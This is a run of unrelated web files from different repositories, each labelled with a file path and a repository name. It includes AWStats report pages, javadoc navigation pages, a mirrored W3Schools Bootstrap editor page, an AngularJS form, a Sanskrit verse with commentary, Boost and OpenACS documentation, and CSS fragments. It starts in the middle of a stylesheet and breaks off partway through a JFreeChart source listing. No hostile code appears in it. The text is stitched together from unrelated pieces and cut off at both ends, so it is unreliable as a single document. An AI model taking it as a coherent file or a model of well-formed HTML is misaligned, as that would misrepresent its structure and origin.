border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; } td.aws { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px;} td.awsm { border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px; } b { font-weight: bold; } a { font: 11px verdana, arial, helvetica, sans-serif; } a:link { color: #0011BB; text-decoration: none; } a:visited { color: #0011BB; text-decoration: none; } a:hover { color: #605040; text-decoration: underline; } .currentday { font-weight: bold; } //--> </style> </head> <body style="margin-top: 0px"> <a name="top"></a> <a name="menu">&nbsp;</a> <form name="FormDateFilter" action="/cgi-bin/awstats.pl?config=ckbran.ru&amp;output=downloads" style="padding: 0px 0px 0px 0px; margin-top: 0"> <table class="aws_border" border="0" cellpadding="2" cellspacing="0" width="100%"> <tr><td> <table class="aws_data sortable" border="0" cellpadding="1" cellspacing="0" width="100%"> <tr><td class="aws" valign="middle"><b>Statistics for:</b>&nbsp;</td><td class="aws" valign="middle"><span style="font-size: 14px;">ckbran.ru</span></td><td align="right" rowspan="3"><a href="http://awstats.sourceforge.net" target="awstatshome"><img src="/awstatsicons/other/awstats_logo6.png" border="0" alt='Awstats Web Site' title='Awstats Web Site' /></a></td></tr> <tr valign="middle"><td class="aws" valign="middle" width="150"><b>Last Update:</b>&nbsp;</td><td class="aws" valign="middle"><span style="font-size: 12px;">30 Oct 2013 - 00:01</span></td></tr> <tr><td class="aws" valign="middle"><b>Reported period:</b></td><td class="aws" valign="middle"><span style="font-size: 14px;">Month Sep 2013</span></td></tr> </table> </td></tr></table> </form> <table> <tr><td class="aws"><a href="javascript:parent.window.close();">Close window</a></td></tr> </table>
doc/br/com/dazen/main/class-use/App.html
CharlesQueiroz/NFValidator
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_25) on Wed Aug 07 11:50:46 BRT 2013 --> <title>Uses of Class br.com.dazen.main.App</title> <meta name="date" content="2013-08-07"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class br.com.dazen.main.App"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../br/com/dazen/main/App.html" title="class in br.com.dazen.main">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?br/com/dazen/main/class-use/App.html" target="_top">Frames</a></li> <li><a href="App.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class br.com.dazen.main.App" class="title">Uses of Class<br>br.com.dazen.main.App</h2> </div> <div class="classUseContainer">No usage of br.com.dazen.main.App</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../br/com/dazen/main/App.html" title="class in br.com.dazen.main">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?br/com/dazen/main/class-use/App.html" target="_top">Frames</a></li> <li><a href="App.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/bootstrap/tryit476d.html
platinhom/ManualHom
<!DOCTYPE html> <html lang="en-US"> <!-- Mirrored from www.w3schools.com/bootstrap/tryit.asp?filename=trybs_case_jumbotron&stacked=h by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 07:34:12 GMT --> <head> <title>Tryit Editor v2.3</title> <meta id="viewport" name='viewport'> <script> (function() { if ( navigator.userAgent.match(/iPad/i) ) { document.getElementById('viewport').setAttribute("content", "width=device-width, initial-scale=0.9"); } }()); </script> <link rel="stylesheet" href="../trycss.css"> <!--[if lt IE 8]> <style> .textareacontainer, .iframecontainer {width:48%;} .textarea, .iframe {height:800px;} #textareaCode, #iframeResult {height:700px;} .menu img {display:none;} </style> <![endif]--> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','../../www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-3855518-1', 'auto'); ga('require', 'displayfeatures'); ga('send', 'pageview'); </script> <script> var googletag = googletag || {}; googletag.cmd = googletag.cmd || []; (function() { var gads = document.createElement('script'); gads.async = true; gads.type = 'text/javascript'; var useSSL = 'https:' == document.location.protocol; gads.src = (useSSL ? 'https:' : 'http:') + '//www.googletagservices.com/tag/js/gpt.js'; var node = document.getElementsByTagName('script')[0]; node.parentNode.insertBefore(gads, node); })(); </script> <script> googletag.cmd.push(function() { googletag.defineSlot('/16833175/TryitLeaderboard', [[728, 90], [970, 90]], 'div-gpt-ad-1383036313516-0').addService(googletag.pubads()); googletag.pubads().setTargeting("content","trybootstrap"); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); </script> <script type="text/javascript"> function submitTryit() { var t=document.getElementById("textareaCode").value; t=t.replace(/=/gi,"w3equalsign"); var pos=t.search(/script/i) while (pos>0) { t=t.substring(0,pos) + "w3" + t.substr(pos,3) + "w3" + t.substr(pos+3,3) + "tag" + t.substr(pos+6); pos=t.search(/script/i); } if ( navigator.userAgent.match(/Safari/i) ) { t=escape(t); document.getElementById("bt").value="1"; } document.getElementById("code").value=t; document.getElementById("tryitform").action="tryit_view52a0.html?x=" + Math.random(); validateForm(); document.getElementById("iframeResult").contentWindow.name = "view"; document.getElementById("tryitform").submit(); } function validateForm() { var code=document.getElementById("code").value; if (code.length>8000) { document.getElementById("code").value="<h1>Error</h1>"; } } </script> <style> .resultHeader { padding-top:15px; } .textareacontainer, .iframecontainer { height:49%; float:none; width:98%; } .textarea, .iframe { position:relative; width:100%; margin:0; height:99%; } .container { min-width:260px; } </style> </head> <body> <div id="ads"> <div style="position:relative;width:100%;margin-top:0px;margin-bottom:0px;"> <div style="width:974px;height:94px;position:relative;margin:0px;margin-top:5px;margin-bottom:5px;margin-right:auto;margin-left:auto;padding:0px;overflow:hidden;"> <!-- TryitLeaderboard --> <div id='div-gpt-ad-1383036313516-0' style='width:970px; height:90px;'> <script type='text/javascript'> googletag.cmd.push(function() { googletag.display('div-gpt-ad-1383036313516-0'); }); </script> </div> <div style="clear:both"></div> </div> </div> </div> <div class="container"> <div class="textareacontainer"> <div class="textarea"> <div class="headerText" style="width:auto;float:left;">Edit This Code:</div> <div class="headerBtnDiv" style="width:auto;float:right;margin-top:8px;margin-right:2.4%;"><button class="submit" type="button" onclick="submitTryit()">See Result &raquo;</button></div> <div class="textareawrapper"> <textarea autocomplete="off" class="code_input" id="textareaCode" wrap="logical" xrows="30" xcols="50"><!DOCTYPE html> <html lang="en"> <head> <title>Bootstrap Case</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="../../maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css"> <script src="../../ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script> <script src="../../maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js"></script> </head> <body> <div class="container"> <div class="jumbotron"> <h1>My first Bootstrap website!</h1> <p>This page will grow as we add more and more components from Bootstrap...</p> </div> <p>This is a paragraph.</p> <p>This is another paragraph.</p> <p>This is a paragraph.</p> <p>This is another paragraph.</p> </div> </body> <!-- Mirrored from www.w3schools.com/bootstrap/tryit.asp?filename=trybs_case_jumbotron&stacked=h by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 07:34:12 GMT --> </html> </textarea> <form autocomplete="off" style="margin:0px;display:none;" action="http://www.w3schools.com/bootstrap/tryit_view.asp" method="post" target="view" id="tryitform" name="tryitform" onsubmit="validateForm();"> <input type="hidden" name="code" id="code" /> <input type="hidden" id="bt" name="bt" /> </form> </div> </div> </div> <div class="iframecontainer"> <div class="iframe"> <div class="headerText resultHeader">Result:</div> <div class="iframewrapper"> <iframe id="iframeResult" class="result_output" frameborder="0" name="view" xsrc="trybs_case_jumbotron.html"></iframe> </div> <div class="footerText">Try it Yourself - &copy; <a href="../index.html">w3schools.com</a></div> </div> </div> </div> <script>submitTryit()</script> </body> </html>
doc/testes/package-summary.html
fabinhodsouza/metodos_avancados_uepb
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="pt"> <head> <!-- Generated by javadoc (1.8.0_25) on Tue Mar 24 10:53:23 BRT 2015 --> <title>testes</title> <meta name="date" content="2015-03-24"> <link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style"> <script type="text/javascript" src="../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="testes"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li class="navBarCell1Rev">Package</li> <li>Class</li> <li><a href="package-use.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li><a href="../index-files/index-1.html">Index</a></li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../model/automovel/package-summary.html">Prev&nbsp;Package</a></li> <li>Next&nbsp;Package</li> </ul> <ul class="navList"> <li><a href="../index.html?testes/package-summary.html" target="_top">Frames</a></li> <li><a href="package-summary.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 title="Package" class="title">Package&nbsp;testes</h1> </div> <div class="contentContainer"> <ul class="blockList"> <li class="blockList"> <table class="typeSummary" border="0" cellpadding="3" cellspacing="0" summary="Class Summary table, listing classes, and an explanation"> <caption><span>Class Summary</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Class</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="../testes/CarroTest.html" title="class in testes">CarroTest</a></td> <td class="colLast"> <div class="block">Aqui será feito os testes referentes ao carro.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../testes/MotoTest.html" title="class in testes">MotoTest</a></td> <td class="colLast"> <div class="block">Testes referentes a <a href="../model/automovel/Moto.html" title="class in model.automovel"><code>Moto</code></a></div> </td> </tr> </tbody> </table> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li class="navBarCell1Rev">Package</li> <li>Class</li> <li><a href="package-use.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li><a href="../index-files/index-1.html">Index</a></li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../model/automovel/package-summary.html">Prev&nbsp;Package</a></li> <li>Next&nbsp;Package</li> </ul> <ul class="navList"> <li><a href="../index.html?testes/package-summary.html" target="_top">Frames</a></li> <li><a href="package-summary.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
app/views/singleitem.html
daniellowtw/angular-parse-crud
<p>This is the singleItem view.</p> {{item}} <form ng-submit="save()"> <input type="text" ng-model="item.name"> <input type="text" ng-model="item.weight"> <label> <input type="checkbox" ng-model="item.in_stock"> In stock </label> <button type="submit">Save</button> </form>
app/src/main/assets/html/en/Ch_C05_S14_V02.html
SrirangaDigital/shankara-android
<html> <head> <meta charset="UTF-8"> <link rel="stylesheet" href="assets/stylesheet-en.css" /> </head> <body class="eng"> <div class='verse' id='Ch_C05_S14_V02' type='mantra'> <div class='versetext'>atsyannaṁ paśyasi priyamattyannaṁ paśyati priyaṁ bhavatyasya brahmavarcasaṁ kulē ya ētamēvamātmānaṁ vaiśvānaramupāstē prāṇastvēṣa ātmana iti hōvāca prāṇasya udakramiṣyadyanmāṁ nāgamiṣya iti ॥ 2 ॥ </div> <div class='bhashya' id='Ch_C05_S14_V02_B01'>atsyannamityādi samānam । prāṇastvēṣa ātmana iti ha uvāca । prāṇastē tava udakramiṣyat utkrāntōऽbhaviṣyat , yanmāṁ nāgamiṣya iti ॥ </div> </div> </body> </html>
lib/boost/boost_1_38_0/doc/html/boost_asio/reference/ip__address_v6/to_string/overload1.html
scs/uclinux
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>ip::address_v6::to_string (1 of 2 overloads)</title> <link rel="stylesheet" href="../../../../boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.73.2"> <link rel="start" href="../../../../boost_asio.html" title="Boost.Asio"> <link rel="up" href="../to_string.html" title="ip::address_v6::to_string"> <link rel="prev" href="../to_string.html" title="ip::address_v6::to_string"> <link rel="next" href="overload2.html" title="ip::address_v6::to_string (2 of 2 overloads)"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../boost.png"></td> <td align="center"><a href="../../../../../../index.html">Home</a></td> <td align="center"><a href="../../../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="../to_string.html"><img src="../../../../../../doc/html/images/prev.png" alt="Prev"></a><a accesskey="u" href="../to_string.html"><img src="../../../../../../doc/html/images/up.png" alt="Up"></a><a accesskey="h" href="../../../../boost_asio.html"><img src="../../../../../../doc/html/images/home.png" alt="Home"></a><a accesskey="n" href="overload2.html"><img src="../../../../../../doc/html/images/next.png" alt="Next"></a> </div> <div class="section" lang="en"> <div class="titlepage"><div><div><h5 class="title"> <a name="boost_asio.reference.ip__address_v6.to_string.overload1"></a><a class="link" href="overload1.html" title="ip::address_v6::to_string (1 of 2 overloads)"> ip::address_v6::to_string (1 of 2 overloads)</a> </h5></div></div></div> <p> Get the address as a string. </p> <pre class="programlisting"><span class="identifier">std</span><span class="special">::</span><span class="identifier">string</span> <span class="identifier">to_string</span><span class="special">()</span> <span class="keyword">const</span><span class="special">;</span> </pre> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright © 2003 - 2008 Christopher M. Kohlhoff<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>) </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="../to_string.html"><img src="../../../../../../doc/html/images/prev.png" alt="Prev"></a><a accesskey="u" href="../to_string.html"><img src="../../../../../../doc/html/images/up.png" alt="Up"></a><a accesskey="h" href="../../../../boost_asio.html"><img src="../../../../../../doc/html/images/home.png" alt="Home"></a><a accesskey="n" href="overload2.html"><img src="../../../../../../doc/html/images/next.png" alt="Next"></a> </div> </body> </html>
webstat/awstats.manager.crimea.edu.alldomains.082012.html
mng-crimea/mng-crimea
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta name="generator" content="AWStats 7.0 (build 1.971) from config file awstats.manager.crimea.edu.conf (http://awstats.sourceforge.net)"> <meta name="robots" content="noindex,nofollow"> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta http-equiv="description" content="Awstats - Advanced Web Statistics for manager.crimea.edu (2012-08) - alldomains"> <title>Statistics for manager.crimea.edu (2012-08) - alldomains</title> <style type="text/css"> <!-- body { font: 11px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; margin-top: 0; margin-bottom: 0; } .aws_bodyl { } .aws_border { border-collapse: collapse; background-color: #CCCCDD; padding: 1px 1px 1px 1px; margin-top: 0px; margin-bottom: 0px; } .aws_title { font: 13px verdana, arial, helvetica, sans-serif; font-weight: bold; background-color: #CCCCDD; text-align: center; margin-top: 0; margin-bottom: 0; padding: 1px 1px 1px 1px; color: #000000; } .aws_blank { font: 13px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; text-align: center; margin-bottom: 0; padding: 1px 1px 1px 1px; } .aws_data { background-color: #FFFFFF; border-top-width: 1px; border-left-width: 0px; border-right-width: 0px; border-bottom-width: 0px; } .aws_formfield { font: 13px verdana, arial, helvetica; } .aws_button { font-family: arial,verdana,helvetica, sans-serif; font-size: 12px; border: 1px solid #ccd7e0; background-image : url(/awstatsicons/other/button.gif); } th { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; } th.aws { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font-size: 13px; font-weight: bold; } td { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; } td.aws { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px;} td.awsm { border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px; } b { font-weight: bold; } a { font: 11px verdana, arial, helvetica, sans-serif; } a:link { color: #0011BB; text-decoration: none; } a:visited { color: #0011BB; text-decoration: none; } a:hover { color: #605040; text-decoration: underline; } .currentday { font-weight: bold; } //--> </style> </head> <body style="margin-top: 0px"> <a name="top"></a> <a name="menu">&nbsp;</a> <form name="FormDateFilter" action="/cgi-bin/awstats.pl?config=manager.crimea.edu&amp;output=alldomains" style="padding: 0px 0px 0px 0px; margin-top: 0"> <table class="aws_border" border="0" cellpadding="2" cellspacing="0" width="100%"> <tr><td> <table class="aws_data sortable" border="0" cellpadding="1" cellspacing="0" width="100%"> <tr><td class="aws" valign="middle"><b>Statistics for:</b>&nbsp;</td><td class="aws" valign="middle"><span style="font-size: 14px;">manager.crimea.edu</span></td><td align="right" rowspan="3"><a href="http://awstats.sourceforge.net" target="awstatshome"><img src="/awstatsicons/other/awstats_logo6.png" border="0" alt='Awstats Web Site' title='Awstats Web Site' /></a></td></tr> <tr valign="middle"><td class="aws" valign="middle" width="150"><b>Last Update:</b>&nbsp;</td><td class="aws" valign="middle"><span style="font-size: 12px;">29 Sep 2012 - 00:02</span></td></tr> <tr><td class="aws" valign="middle"><b>Reported period:</b></td><td class="aws" valign="middle"><span style="font-size: 14px;">Month Aug 2012</span></td></tr> </table> </td></tr></table> </form> <table> <tr><td class="aws"><a href="javascript:parent.window.close();">Close window</a></td></tr> </table> <a name="domains">&nbsp;</a><br /> <table class="aws_border sortable" border="0" cellpadding="2" cellspacing="0" width="100%"> <tr><td class="aws_title" width="70%">Visitors domains/countries </td><td class="aws_blank">&nbsp;</td></tr> <tr><td colspan="2"> <table class="aws_data" border="1" cellpadding="2" cellspacing="0" width="100%"> <tr bgcolor="#ECECEC"><th width="32">&nbsp;</th><th colspan="2">Domains/Countries</th><th bgcolor="#4477DD" width="80">Pages</th><th bgcolor="#66DDEE" width="80">Hits</th><th class="datasize" bgcolor="#2EA495" width="80">Bandwidth</th><th>&nbsp;</th></tr> </table></td></tr></table><br /> <br /><br /> <span dir="ltr" style="font: 11px verdana, arial, helvetica; color: #000000;"><b>Advanced Web Statistics 7.0 (build 1.971)</b> - <a href="http://awstats.sourceforge.net" target="awstatshome">Created by awstats</a></span><br /> <br /> </body> </html>
packages/acs-templating/www/doc/tagref/switch.html
openacs/openacs-core
<html> <head> <title>Templating System Tag Reference: Switch</title> </head> <body bgcolor="#ffffff"> <h2>Switch</h2> <a href="..">Templating System</a> : <a href="../designer-guide.html">Designer Guide</a> : <a href="index.html">Tag Reference</a> : Switch <hr> <h3>Summary</h3> <p>The <kbd>switch</kbd> tag is used to output one of n-sections when the switch variable matches one of the n-case statements. A default section can also be output if none of the n-case statements matches the switch variable.</p> <h3>Usage Examples</h3> <pre> &lt;switch @x@&gt; &lt;case value="Fred"&gt; Hello Fred. &lt;/case&gt; &lt;case value="Greta"&gt; Hello Greta. &lt;/case&gt; &lt;case value="Sam"&gt; Hello Sam &lt;/case&gt; &lt;default&gt; I don't recognize your name. &lt;/default&gt; &lt;/switch&gt; </pre> <p>Tcl-equivalent flags have the same meaning as in the tcl-switch statement. Supported flags include exact, glob, and regexp.</p> <pre> &lt;switch flag=glob @x@&gt; &lt;case value="F*"&gt; Hello Fred. &lt;/case&gt; &lt;case value="G*"&gt; Hello Greta. &lt;/case&gt; &lt;case value="H*"&gt; Hello Sam &lt;/case&gt; &lt;default&gt; You are in the section for people whose names start with F, G, or H. &lt;/default&gt; &lt;/switch&gt; </pre> <p> Case tags also have an alternative form for matching a list of items.</p> <p> <pre> &lt;switch @x@&gt; &lt;case in "Fred" "Greta" "Sam"&gt; Your must be Fred Greta or Sam, but I'm not sure which one. &lt;/case&gt; &lt;default&gt; I don't recognize your name. &lt;/default&gt; &lt;/switch&gt; </pre> <p> <h3>Notes</h3> <ul> <li><p>Any legal variables that may be referenced in the template may also be used in <kbd>switch</kbd> statements. <li><p>Phrases with spaces in them must be enclosed in double quotes and curly braces to be matched correctly. Failure to quote words with spaces correctly results in an error. <pre> &lt;case "{blue sky}"> &lt;td bgcolor="#0000ff"> &lt;/case></pre> </ul> <hr> <!-- <a href="mailto:templating@arsdigita.com">templating@arsdigita.com</a> -->
wp-content/plugins/rublon/assets/css/rublon2factor_admin_safari.css
khanhnd91/khaosan
.rublon-unlocked { top: -5px; } .rublon-locked { top: -4px; }
build/diacritic-annotator.min.css
lduarte1991/diacritic-annotator
.mark{width:10px;height:10px;position:absolute;background-size:contain}
libs/jfreechart-1.0.16/javadoc/src-html/org/jfree/chart/labels/IntervalXYItemLabelGenerator.html
Mr-Steve/LTSpice_Library_Manager
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>Source code</title> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> </head> <body> <div class="sourceContainer"> <pre><span class="sourceLineNo">001</span>/* ===========================================================<a name="line.1"></a> <span class="sourceLineNo">002</span> * JFreeChart : a free chart library for the Java(tm) platform<a name="line.2"></a> <span class="sourceLineNo">003</span> * ===========================================================<a name="line.3"></a> <span class="sourceLineNo">004</span> *<a name="line.4"></a> <span class="sourceLineNo">005</span> * (C) Copyright 2000-2013, by Object Refinery Limited and Contributors.<a name="line.5"></a> <span class="sourceLineNo">006</span> *<a name="line.6"></a> <span class="sourceLineNo">007</span> * Project Info: http://www.jfree.org/jfreechart/index.html<a name="line.7"></a> <span class="sourceLineNo">008</span> *<a name="line.8"></a> <span class="sourceLineNo">009</span> * This library is free software; you can redistribute it and/or modify it<a name="line.9"></a> <span class="sourceLineNo">010</span> * under the terms of the GNU Lesser General Public License as published by<a name="line.10"></a> <span class="sourceLineNo">011</span> * the Free Software Foundation; either version 2.1 of the License, or<a name="line.11"></a> <span class="sourceLineNo">012</span> * (at your option) any later version.<a name="line.12"></a> <span class="sourceLineNo">013</span> *<a name="line.13"></a> <span class="sourceLineNo">014</span> * This library is distributed in the hope that it will be useful, but<a name="line.14"></a> <span class="sourceLineNo">015</span> * WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY<a name="line.15"></a> <span class="sourceLineNo">016</span> * or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public<a name="line.16"></a> <span class="sourceLineNo">017</span> * License for more details.<a name="line.17"></a> <span class="sourceLineNo">018</span> *<a name="line.18"></a> <span class="sourceLineNo">019</span> * You should have received a copy of the GNU Lesser General Public<a name="line.19"></a> <span class="sourceLineNo">020</span> * License along with this library; if not, write to the Free Software<a name="line.20"></a> <span class="sourceLineNo">021</span> * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,<a name="line.21"></a> <span class="sourceLineNo">022</span> * USA.<a name="line.22"></a> <span class="sourceLineNo">023</span> *<a name="line.23"></a> <span class="sourceLineNo">024</span> * [Oracle and Java are registered trademarks of Oracle and/or its affiliates. <a name="line.24"></a> <span class="sourceLineNo">025</span> * Other names may be trademarks of their respective owners.]<a name="line.25"></a> <span class="sourceLineNo">026</span> *<a name="line.26"></a> <span class="sourceLineNo">027</span> * ---------------------------------<a name="line.27"></a> <span class="sourceLineNo">028</span> * IntervalXYItemLabelGenerator.java<a name="line.28"></a> <span class="sourceLineNo">029</span> * ---------------------------------<a name="line.29"></a> <span class="sourceLineNo">030</span> * (C) Copyright 2008, by Object Refinery Limited.<a name="line.30"></a> <span class="sourceLineNo">031</span> *<a name="line.31"></a> <span class="sourceLineNo">032</span> * Original Author: David Gilbert (for Object Refinery Limited);<a name="line.32"></a> <span class="sourceLineNo">033</span> * Contributor(s): -;<a name="line.33"></a> <span class="sourceLineNo">034</span> *<a name="line.34"></a> <span class="sourceLineNo">035</span> * Changes<a name="line.35"></a> <span class="sourceLineNo">036</span> * -------<a name="line.36"></a> <span class="sourceLineNo">037</span> * 26-May-2008 : Version 1 (DG);<a name="line.37"></a> <span class="sourceLineNo">038</span> *<a name="line.38"></a> <span class="sourceLineNo">039</span> */<a name="line.39"></a> <span class="sourceLineNo">040</span><a name="line.40"></a> <span class="sourceLineNo">041</span>package org.jfree.chart.labels;<a name="line.41"></a> <span class="sourceLineNo">042</span><a name="line.42"></a> <span 